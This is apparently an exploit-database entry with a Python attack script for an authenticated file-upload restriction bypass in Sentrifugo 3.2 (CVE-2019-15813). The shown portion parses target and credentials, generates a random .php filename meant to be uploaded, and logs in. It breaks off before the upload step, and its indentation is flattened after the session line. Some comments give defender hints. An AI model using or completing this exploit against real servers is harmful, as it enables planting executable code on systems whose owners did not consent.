Exploits / Vulnerability Discovered : 2020-10-27 |
Type : webapps |
Platform : php
This exploit / vulnerability, Sentrifugo 3.2 file upload restriction bypass (authenticated), is for educational purposes only; if you use it, you do so at your own risk!
from argparse import ArgumentParser, RawTextHelpFormatter
from bs4 import BeautifulSoup, Tag
from requests.sessions import Session
import tempfile as tmp
import os.path as path
import random
import string
from huepy import *
# Command-line interface. All three options are mandatory and are stored
# under the single-letter attributes args.t, args.u and args.p.
# NOTE: --password is read from argv, so the credential ends up in shell
# history and process listings on the host that runs the script.
parser = ArgumentParser(
    description="Exploit for CVE-2019-15813",
    formatter_class=RawTextHelpFormatter,
)
for _long, _short, _help, _dest in (
    ("--target", "-t", "target uri where application is installed", "t"),
    ("--user", "-u", "username to authenticate", "u"),
    ("--password", "-p", "password to authenticate", "p"),
):
    # metavar="" suppresses the value placeholder in the --help output.
    parser.add_argument(
        _long,
        _short,
        help=_help,
        required=True,
        metavar="",
        dest=_dest,
    )
args = parser.parse_args()
# Drop one trailing slash (and only one) from the base URI so that the
# request paths appended to it later do not contain a double slash.
args.t = args.t[:-1] if args.t.endswith("/") else args.t

# Random 13-letter ASCII stem with a .php extension. F is not used in the
# lines visible here; presumably it names the file handled later in the
# script (TODO confirm). For defenders, a freshly created, randomly named
# .php file under the application's upload path is a useful indicator.
_stem = "".join(random.choices(string.ascii_letters, k=13))
F = _stem + ".php"
with Session() as http:
print(run("Logging in"))
data = {"username": args.u, "password": args.p}
r = http.post(args.t + "/index.php/index/loginpopupsave",
data=data,
allow_redirects=False)
if not (r.headers.get("Location", "").endswith("welcome")
or r.headers.get("Location", "").endswith("welcome/")):
print(bad("Unable to login. Check username / password"))
exit(1)
print(good("Logged in"))